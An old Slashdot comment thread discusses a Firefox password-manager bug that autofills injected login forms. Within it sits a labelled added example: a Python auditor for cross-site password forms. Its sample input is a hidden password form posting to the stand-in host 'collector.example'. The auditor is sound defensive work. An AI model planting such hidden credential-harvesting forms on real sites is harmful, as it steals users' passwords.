    (http://en.wikipedia....vated_protein_kinase | Last Journal: Monday April 30 2007, @06:22AM)
    Firefox started to disappoint me. I do still belong to mustdie crowd but FF starts to irritate me.

    First, it deletes files when they are dragged into the browser window. IE won't even allow you to do the dragging.

    Second, if you are getting messages from your Yahoo groups by e-mail on your gmail account, the Yahoo ads are overlaying the text. IE does not do that.

    I can easily foresee that if this will continue I am going to consider switching to some other browser. Any recommendations?
    • FF FUD .. by rs232 (Score:2) Wednesday November 22 2006, @09:52AM
    • Re:FF problems by Nicolay77 (Score:2) Wednesday November 22 2006, @07:11PM
  • Not that bad (Score:2)

    by mapkinase (958129) on Wednesday November 22 2006, @07:10AM (#16947746)
    (http://en.wikipedia....vated_protein_kinase | Last Journal: Monday April 30 2007, @06:22AM)
    From what I have read, it takes a n00b to be fooled in that way. AFAIU, the phishing succeeds only if you send the autocompleted form. Who in the right mind would send the form that appeared from nowhere? If I do not expect a form in this place, I do not submit it.

    I suspect that many bugs like that can be easily avoided by clean behaviour.
    • Re:Not that bad by adpsimpson (Score:1) Wednesday November 22 2006, @09:13AM
      • Re:Not that bad by mapkinase (Score:2) Wednesday November 22 2006, @10:07AM
  • by sherriw (794536) on Wednesday November 22 2006, @08:01AM (#16948148)
    I was wondering, if FF or any browser auto-populates your login fields, couldn't someone use Ajax to just grab the values and send them to the server before you even hit submit?
  • I could be mistaken, but couldn't the need for the user to submit the form (request) be sidestepped with AJAX/Web 2.0 scripting, sending the password as soon as the field is populated? Or does the obfuscation of the password field in the browser prevent this?
  • I just tested it with Seamonkey 1.0.6 (I prefer it over firefox) and the exploit happens on it as well.
  • by mysidia (191772) on Wednesday November 22 2006, @02:26PM (#16955450)

    After carefully examining the issue, I come to the conclusion, that for this supposed issue to show up, it means that the legitimate site you are visiting has been hijacked, and a fake login form inserted. If that is the case, the user is liable to enter the username and password. Firefox password manager or not: when the user clicks submit, the password goes to the other site, whether password manager is enabled or not.

    Anyone who can inject arbitrary HTML can possibly get your password. This isn't a bug, it's a consequence of submitting your password using an HTML form, and allowing other users fine control of what scripting and form elements appear on the page.

    Sites that wish to guard against such attacks should utilize the more robust systems available for authentication, which include: HTTP authentication and Client-side SSL certificates. In both of these cases, a HTML page need not have direct access to the authentication information provided by the user to the web server.

    Users of the browser should just be aware that 'password manager' is not an anti-phishing feature in this version of Firefox -- if the site you are visiting wishes to spill your password to another site, when you login, nothing can stop them, whether you use password manager or not. In fact, they can use AJAX to send your password to who knows what other sites in the world, from the moment you start typing it into a HTML form.

    I only hit 'save password' for places where it's safe to do, and when I do so, I rather have it err on the side of filling in a password field, than ever have it err on the side of 'not filling in the password', because it thinks a form might be fake. I'll be the judge of that.

    Cross-site forms are a feature of HTML. The issue in this case is that a page author can insert a malicious password form on a legitimate site in the first place.

    Exploitation of this so called "bug" relies on the site you visit cooperating with the outside site.

    That tells me it's not a bug in password manager. The bug is that a site allows a malicious login form to appear on it in the first place. EOM.
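
An added example, not part of the comment above: one way a site that hosts user markup could audit it for the condition under discussion, a form containing a password input whose action points at a different host than the page. The hosts `social.example` and `collector.example`, the sample markup and the inline-style heuristic for hidden fields are assumptions made for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed input: user-supplied profile markup with an invisible login form.
SAMPLE = ('<p>profile</p><form action="https://collector.example/c">'
          '<input name="u"><input type="password" name="p" '
          'style="display: none"></form>')


class PasswordFormAudit(HTMLParser):
    """Collects every <form> that contains a password input."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url, self.current, self.findings = page_url, None, []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            if self.current is not None:     # previous form never closed
                self._finish()
            # An empty or missing action submits back to the page itself.
            target = urljoin(self.page_url, a.get("action") or "")
            self.current = {"action": target, "password": False, "hidden": False}
        elif tag == "input" and self.current is not None:
            if (a.get("type") or "").lower() == "password":
                self.current["password"] = True
                # Heuristic: inline styles only, not stylesheets or wrappers.
                style = (a.get("style") or "").replace(" ", "").lower()
                if "display:none" in style or "visibility:hidden" in style:
                    self.current["hidden"] = True

    def handle_endtag(self, tag):
        if tag == "form" and self.current is not None:
            self._finish()

    def _finish(self):
        if self.current["password"]:
            self.findings.append(self.current)
        self.current = None


def audit(markup, page_url):
    """Return password forms found in markup, flagging off-site submission."""
    parser = PasswordFormAudit(page_url)
    parser.feed(markup)
    parser.close()
    if parser.current is not None:           # form tag never closed
        parser._finish()
    page_host = urlsplit(page_url).hostname
    for form in parser.findings:
        form["cross_site"] = urlsplit(form["action"]).hostname != page_host
    return parser.findings
```
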

  • passwordmaker (Score:2)

    by yulek (202118) on Thursday November 23 2006, @12:12AM (#16961650)
    (http://www.popmonkey.com/ | Last Journal: Sunday December 12 2004, @04:26AM)
    better than any password manager: http://www.passwordmaker.org/ [passwordmaker.org]
  • by bluefoxlucid (723572) on Sunday December 03 2006, @12:07AM (#17086562)
    (Last Journal: Monday October 09 2006, @07:35PM)
  • Re:What an incredible gaffe (Score:3, Informative)

    by Andy_R (114137) on Tuesday November 21 2006, @06:47PM (#16942026)
    (http://slashdot.org/ | Last Journal: Friday October 01 2004, @07:19AM)
    Of course it's far less shocking that the same bug is present in IE6 and IE7! I wonder which browser you will be recommending... do you know of one that passes the test-case linked to from the bugzilla page?
  • Re:What an incredible gaffe (Score:3, Insightful)

    by ResidntGeek (772730) on Tuesday November 21 2006, @06:54PM (#16942124)
    Right, because you contribute to Firefox, right? If you did, you'd of course have been able to spot this bug with your razor-sharp eyes, right? Oh wait... no, I just remembered you're fallible too, and quite possibly an idiot. Firefox is free. The dev team doesn't have to do shit, they choose to. Stop acting like an entitled 8-year-old at Christmas, and do something useful with your time.
  • by PastAustin (941464) on Tuesday November 21 2006, @07:01PM (#16942226)
    It would seem sort of silly to me to stop advocating Firefox because it has one BIG bug. Most browsers have 100 HUGE bugs. It is still better than any other browser.

    I wouldn't think this would be a hard fix. Silly Firefox development team. =)
  • Re:Just 2.0 ? (Score:1)

    by spatley (191233) <spatley@@@yahoo...com> on Tuesday November 21 2006, @07:19PM (#16942478)
    (http://spatley.com/)
    Same here in 1.5.0.2
  • Re:Just 2.0 ? (Score:1)

    by JackieBrown (987087) <dbroome@gmail.com> on Tuesday November 21 2006, @07:58PM (#16943088)
    (http://debcentral.org/)
    I set my agent ID as firefox in Konqueror but the exploit didn't work. Damn, one of the few things user agent can't emulate.
  • Re:Just 2.0 ? (Score:1)

    by quadra23 (786171) on Tuesday November 21 2006, @10:58PM (#16944858)
    (Last Journal: Wednesday June 06, @03:44PM)
    I just ran the test on 1.5.0.7 and I am not affected.

    Somehow Firefox 1.5.0.8 seems to allow this exploit also. Are you sure 1.5.0.7 isn't vulnerable? If so, then wow I guess things went backwards between the two releases.

    maybe it doesn't work the same on ubuntu

    Although this could actually be why, I ran the test on a Windows XP Pro machine. If this only happens on Windows (though I don't know this for certain) chances are it might not be the Firefox team's fault after all. Interesting that 1passwd [it-observer.com] appears to have released a new version of their password manager little over a week ago before this exploit became publicly known. Mac users might like the OS X keychain integration.
    • Re:Just 2.0 ? by JackieBrown (Score:1) Tuesday November 21 2006, @11:26PM
  • Re:Just 2.0 ? (Score:2)

    by Run4yourlives (716310) on Wednesday November 22 2006, @12:24AM (#16945460)
    I ran it (the proof of concept) on the same version and it didn't transmit anything to google.
    • Re:Just 2.0 ? by giorgosts (Score:1) Wednesday November 22 2006, @10:26AM